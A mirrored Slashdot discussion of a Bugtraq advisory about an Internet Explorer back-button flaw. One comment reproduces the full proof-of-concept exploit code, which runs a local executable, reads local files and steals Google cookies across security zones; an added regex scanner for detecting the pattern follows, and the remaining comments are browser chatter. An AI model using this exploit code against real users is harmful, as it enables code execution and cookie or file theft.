Slashdot Mirror


Don't Hit That Back Button

Saint Aardvark writes: "From the Bugtraq mailing list comes this warning: 'Using the Back Button in IE is dangerous'. When hitting the back button, javascript links will be executed in the security zone of the last url viewed. Proof-of-concept included in the warning will execute minesweeper or read your Google cookies."

4 of 640 comments

  1. Proof-of-Concept by acm · · Score: 2, Redundant

    <html>
    <h1>Press link and then the backbutton to trigger script.</h1>
    <a href="javascript:execFile('file:///c:/winnt/system32/winmine.exe')">
    Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>
    <a href="javascript:execFile('file:///c:/windows/system32/winmine.exe')">
    Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
    <a href="javascript:readFile('file:///c:/test.txt')">
    Read c:\test.txt (needs to be created)</a><br>
    <a href="javascript:readCookie('http://www.google.com/')">
    Read Google cookie</a>

    <script>
    // badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
    badUrl = "res:";
    function execFile(file){
    s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 ';
    s+= 'CODEBASE='+file+'></OBJECT>';
    backBug(badUrl,s);
    }
    function readFile(file){
    s = '<iframe name=i src='+file+' style=display:none onload=';
    s+= 'alert(i.document.body.innerText)></iframe>';
    backBug(badUrl,s);
    }
    function readCookie(url){
    s = '<script>alert(document.cookie);close();<"+"/script>';
    backBug(url,s);
    }
    function backBug(url,payload){
    len = history.length;
    page = document.location;
    s = "javascript:if (history.length!="+len+") {";
    s+= "open('javascript:document.write(\""+payload+"\")' )";
    s+= ";history.back();} else '<script>location=\""+url
    s+= "\";document.title=\""+page+"\";<"+"/script> ';";
    location = s;
    }
    </script>
    </html>
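Added example, not part of the original comment or the Bugtraq advisory: a heuristic scanner a content filter could run over a page to flag the pattern the proof-of-concept's `backBug` function relies on. The trait names, regular expressions and both sample pages are assumptions constructed for illustration.

```javascript
// Flags inline scripts that combine the three traits the proof-of-concept uses:
// a javascript: URL string, a write to location, and use of session history.
// Each trait alone is common; all three in one script deserves a manual review.
const TRAITS = {
  jsUrlString: /["']\s*javascript:/i,
  locationWrite: /\b(?:document\.|window\.)?location(?:\.href)?\s*=[^=]/i,
  historyUse: /\bhistory\.(?:back\s*\(|go\s*\(\s*-|length\b)/i,
};

// Return the bodies of inline <script> elements.
function inlineScripts(html) {
  const bodies = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) bodies.push(m[1]);
  return bodies;
}

// Report every inline script in which all three traits are present.
function scanPage(html) {
  const names = Object.keys(TRAITS);
  const findings = [];
  inlineScripts(html).forEach((code, index) => {
    const hits = names.filter((name) => TRAITS[name].test(code));
    if (hits.length === names.length) findings.push({ script: index, traits: hits });
  });
  return findings;
}

// Constructed sample: same control flow as backBug, with no payload.
const SUSPECT_PAGE = `<script>
function nav() {
  var len = history.length;
  var s = "javascript:if (history.length!=" + len + ") { history.back(); } else 'x';";
  location = s;
}
</script>`;

// Constructed sample: ordinary navigation helpers (two traits, no javascript: URL).
const BENIGN_PAGE = `<script>
function goBack() { history.back(); }
function goHome() { location = "/home"; }
</script>`;

console.log("suspect:", JSON.stringify(scanPage(SUSPECT_PAGE)));
console.log("benign:", JSON.stringify(scanPage(BENIGN_PAGE)));
```

The scanner only inspects inline script bodies, so it misses external scripts and obfuscated strings.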

  2. Re:Go Mozilla! by croanon · · Score: 0, Redundant

    Come on. Opera is much much much faster than IE. I have been using it for quite a long time now. I feel stupid that I followed the hype and used IE for a long time. If you get used to the Opera GUI (in fact, I installed the AQUA skin last month. It ROCKS!), you will never turn back to the IE GUI. Believe me. :) Also, Opera has this beautiful feature, "mouse movement commands", which I can argue is the best extension ever to any web browser ever created. It makes the surfing experience 10 times more pleasurable. :)

    --
    Dear Bill, do you have a .net tattoo on your ass for marketing?
  3. Re:Go Mozilla! by croanon · · Score: 0, Redundant

    I've been using Opera for quite a long time, I am very pleased with it. :)

    --
    Dear Bill, do you have a .net tattoo on your ass for marketing?
  4. Re:Go Mozilla! by croanon · · Score: 0, Redundant

    This is simply not true, dear Anonymous Coward. :) I am very pleased with Opera's CSS and Javascript support. And its mouse gestures, and aqua interface, and its speed, and its availability in more than 5 OSs etc. :) Mozilla 0.9 and Netscape 6+ are also nice though. But IE really, really sucks.

    --
    Dear Bill, do you have a .net tattoo on your ass for marketing?